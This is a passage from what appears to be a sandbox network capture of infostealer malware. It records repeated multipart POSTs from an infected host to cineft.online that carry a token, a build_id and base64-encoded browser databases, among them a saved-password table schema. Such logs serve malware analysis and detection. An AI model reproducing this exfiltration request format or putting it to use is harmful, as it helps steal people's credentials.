AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:50 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	50139	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:51 UTC	327	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----I58QQIWLXBIM7Y5P8Q9R User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 55081 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:51 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 49 35 38 51 51 49 57 4c 58 42 49 4d 37 59 35 50 38 51 39 52 0d 0a 43 6f 6e 74 Data Ascii: ------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------I58QQIWLXBIM7Y5P8Q9RContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------I58QQIWLXBIM7Y5P8Q9RCont
2024-12-14 22:59:51 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:51 UTC	16355	OUT	Data Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 42 2f 67 41 4c 51 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpB/gALQAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:51 UTC	6016	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:52 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:52 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:52 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	50144	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:53 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----X4OH4OHLXBIMYUSRQQ1N User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 142457 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 58 34 4f 48 34 4f 48 4c 58 42 49 4d 59 55 53 52 51 51 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 58 34 4f 48 34 4f 48 4c 58 42 49 4d 59 55 53 52 51 51 31 4e 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 58 34 4f 48 34 4f 48 4c 58 42 49 4d 59 55 53 52 51 51 31 4e 0d 0a 43 6f 6e 74 Data Ascii: ------X4OH4OHLXBIMYUSRQQ1NContent-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------X4OH4OHLXBIMYUSRQQ1NContent-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------X4OH4OHLXBIMYUSRQQ1NCont
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 76 62 6e 52 68 59 33 52 66 61 57 35 6d 62 79 41 6f 5a 33 56 70 5a 43 42 57 51 56 4a 44 53 45 46 53 49 46 42 53 53 55 31 42 55 6c 6b 67 53 30 56 5a 4c 43 42 31 63 32 56 66 59 32 39 31 62 6e 51 67 53 55 35 55 52 55 64 46 55 69 42 4f 54 31 51 67 54 6c 56 4d 54 43 42 45 52 55 5a 42 56 55 78 55 49 44 41 73 49 48 56 7a 5a 56 39 6b 59 58 52 6c 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 6b 59 58 52 6c 58 32 31 76 5a 47 6c 6d 61 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 73 59 57 35 6e 64 57 46 6e 5a 56 39 6a 62 32 52 6c 49 46 5a 42 55 6b 4e 49 51 56 49 73 49 47 78 68 59 6d 56 73 49 46 5a 42 55 6b 4e 49 51 56 Data Ascii: vbnRhY3RfaW5mbyAoZ3VpZCBWQVJDSEFSIFBSSU1BUlkgS0VZLCB1c2VfY291bnQgSU5URUdFUiBOT1QgTlVMTCBERUZBVUxUIDAsIHVzZV9kYXRlIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBkYXRlX21vZGlmaWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBsYW5ndWFnZV9jb2RlIFZBUkNIQVIsIGxhYmVsIFZBUkNIQV
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:53 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:53 UTC	11617	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-14 22:59:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:54 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	50147	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:54 UTC	325	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----58GVK6XT2VAAAIE3O8Y5 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 493 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:54 UTC	493	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 35 38 47 56 4b 36 58 54 32 56 41 41 41 49 45 33 4f 38 59 35 0d 0a 43 6f 6e 74 Data Ascii: ------58GVK6XT2VAAAIE3O8Y5Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------58GVK6XT2VAAAIE3O8Y5Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------58GVK6XT2VAAAIE3O8Y5Cont
2024-12-14 22:59:55 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 14 Dec 2024 22:59:55 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-12-14 22:59:55 UTC	12	IN	Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	50152	116.203.12.241	443

Timestamp	Bytes transferred	Direction	Data
2024-12-14 22:59:57 UTC	328	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DTJW4E37YCBIEU37YUA1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: cineft.online Content-Length: 169765 Connection: Keep-Alive Cache-Control: no-cache
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 32 33 32 61 30 30 65 33 39 32 64 34 33 38 33 66 61 66 30 31 35 35 36 62 39 62 65 65 62 66 38 32 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 65 34 31 31 63 66 36 32 62 63 62 61 30 34 64 37 34 66 63 36 62 35 30 35 62 39 32 33 35 34 30 34 0d 0a 2d 2d 2d 2d 2d 2d 44 54 4a 57 34 45 33 37 59 43 42 49 45 55 33 37 59 55 41 31 0d 0a 43 6f 6e 74 Data Ascii: ------DTJW4E37YCBIEU37YUA1Content-Disposition: form-data; name="token"232a00e392d4383faf01556b9beebf82------DTJW4E37YCBIEU37YUA1Content-Disposition: form-data; name="build_id"e411cf62bcba04d74fc6b505b9235404------DTJW4E37YCBIEU37YUA1Cont
2024-12-14 22:59:57 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
